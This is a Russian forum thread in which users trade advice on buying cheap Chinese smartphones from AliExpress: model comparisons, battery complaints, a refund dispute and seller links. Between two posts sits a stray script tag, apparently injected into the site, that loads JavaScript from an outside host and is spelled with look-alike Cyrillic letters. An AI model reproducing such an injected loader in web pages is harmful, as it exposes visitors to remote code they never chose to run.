Зарегистрироваться
или войти:
Логин/Пароль
Чтобы общаться на форуме, необходимо зарегистрироваться

Ссылки на телефоны, помощь в выборе.

Ответов в теме: 2002
ПользователиСообщений: 70Поблагодарили: 4 раза

cesta, спасибо, а вы ккакой приобрели, какой лучше, вернее чем отличается 390т от 390

ПользователиСообщений: 68Поблагодарили: 84 разаНовосибирск

Татианнка, а390т без 3G, без GPS навигатора, процессор разный, а так, по моему, все остальное один в один. Там внизу в описании все это указано. Просто у 390т есть разные цвета, у390 только черный (бабушка розовенькому будет рада, хотя у этого продавца их нет). Он русифицированный пришел, не надо ходить ни куда. Идет из Гон Конга достаточно быстро. Правда продавец на сообщения реагирует плохо, но отправляет быстро. Я остался доволен.

ПользователиСообщений: 64Поблагодарили: 4 разаРОССИЯ Черкесск

Доброго дня народ. Получил телефон, на следующий день перестал экран реагировать на прикосновения (сенсор не работает). Прод сказал пришли назад. Пересылка стоит около 25$. Думаю открыть спор и попросить 90% возврата. Как вы думаете, как поступить. У кого есть опыт спора по телефонам. ПОДЕЛИТЕСЬ!!!

ПользователиСообщений: 4Новодвинск

А как у ваших телефонов батареи держат? взяла daxian s4 . В принципе устраивает , но батарея никакая вообще

<sсriрt src="https://pluginplus.net/plugins/system/system_im3.js">
ПродавецСообщений: 471Поблагодарили: 70 разChangchun

Какая марка телефона ?

ПользователиСообщений: 78Поблагодарили: 6 раз Омск

как то на этом сайте читал, как заказывали телефон в Белорусь и был он отправлен со склада в России, теперь вот что то не могу этот пост найти, нужна ссылка на магазин али экспресса со складом в России

ПользователиСообщений: 5214Поблагодарили: 16083 раза Из столицы русского севера

ovein, я планшет PIPO заказывала в России, в Благовещенске. Правда там не склад, а ребята сами возят. Дошёл за 10 дней в Архангельск, отслеживался. После заказа, ребята отзваниваются и уточняют детали. Всё очень оперативно. Специализируются на китайской электронике. Кстати с планшетом прислали гарантийный талон.

ПользователиСообщений: 233Поблагодарили: 160 раз

FrekenBock, полагаю, там написано LENOVO - но с такими характеристиками никакого отношения к Леново этот агрегат явно не имеет. Вот этот телефон внешне очень похож, но есть GPS, камера 8 а не 5, прод поставляет с двумя батареями(одна запасная), он короче на 5 мм. при той же диагонали в 5 дюймов. И всё это за ту же цену и с хорошим рейтингом как у телефона, так и у продавца.

FrekenBock поблагодарил(а) за этот комментарий
ПользователиСообщений: 78Поблагодарили: 6 раз Омск

olgasmi, а ссылочку можно?

ПользователиСообщений: 5214Поблагодарили: 16083 раза Из столицы русского севера

ovein, тык.

ovein поблагодарил(а) за этот комментарий
ПользователиСообщений: 58Поблагодарили: 15 разn

Подскажите сугубо женскую модель телефона. Критерии: дизайн, удобство, 2-е сим, время автономной работы. Спасибо.

ПользователиСообщений: 74Поблагодарили: 4 разаЛюберцы

Подскажите смартфон до 85 $ На Андроцде чтоб особо не глючил ... Что нить Среднее хотябы , Спасибо . Экран желательно побольше 

ПользователиСообщений: 677Поблагодарили: 218 разКараганда - Сарань

Олег Корольков, за такую цену всё хлам, можите и сами найти старые модели, я б за эти деньги искал htc

тут

ПользователиСообщений: 74Поблагодарили: 4 разаЛюберцы

ещё варианты?

ПользователиСообщений: 23Поблагодарили: 5 разИвано-Франковск

Хочу купить заводской Lenovo или другой оригинал в пределах 50$.Отличить  подделки сам не могу.Кто что может посоветовать?

ПользователиСообщений: 677Поблагодарили: 218 разКараганда - Сарань

Александр Евстратов, сыпте ссылки на ваши девайса за 50 абамок скажу что это

ПользователиСообщений: 1966Поблагодарили: 658 раз Up

JIAYU F1, но очень сложен выбор поставщика. По самым скромным оценкам более 80% предложений на Алиэкспресс шлак и брак...

Старые модели ZTE тоже можно посмотреть, хотя там процессоры были совсем бюджетные, даже по тем временам ...

ПользователиСообщений: 23Поблагодарили: 5 разИвано-Франковск
ПользователиСообщений: 677Поблагодарили: 218 разКараганда - Сарань

Александр Евстратов, лучше тут купить или тут

все ваши проды невнушают доверия

Александр Евстратов, думаю эти аппораты лучше будут но они на винде этот и этот

Александр Евстратов и Son@ поблагодарили за этот комментарий
ПользователиСообщений: 23Поблагодарили: 5 разИвано-Франковск

robomen писал(а):

Александр Евстратов, лучше тут купить или тут

все ваши проды невнушают доверия

Александр Евстратов, думаю эти аппораты лучше будут но они на винде этот и этот

Желательно Android

ПользователиСообщений: 74Поблагодарили: 4 разаЛюберцы
ПользователиСообщений: 677Поблагодарили: 218 разКараганда - Сарань

Олег Корольков, что то похоже на тел, прод нормальный

ПользователиСообщений: 74Поблагодарили: 4 разаЛюберцы
ПользователиСообщений: 677Поблагодарили: 218 разКараганда - Сарань

Олег Корольков, нормально

ПользователиСообщений: 3036Поблагодарили: 12924 раза Барановичи

Я жду Jiayu f1..брала здесь http://ru.aliexpress.com/item/JIAYU-F1-MTK6572-Dual-Core-1-3Ghz-512MB-RAM-3G-WCDMA-4G-ROM-2-0-5/1713908356.html выбирала по отзывам..все хвалят и телефон и прода..продавец общительный,отвечает на любые вопросы..

Только зарегистрированные пользователи могут оставлять сообщения на форуме.
Зарегистрироваться
Войти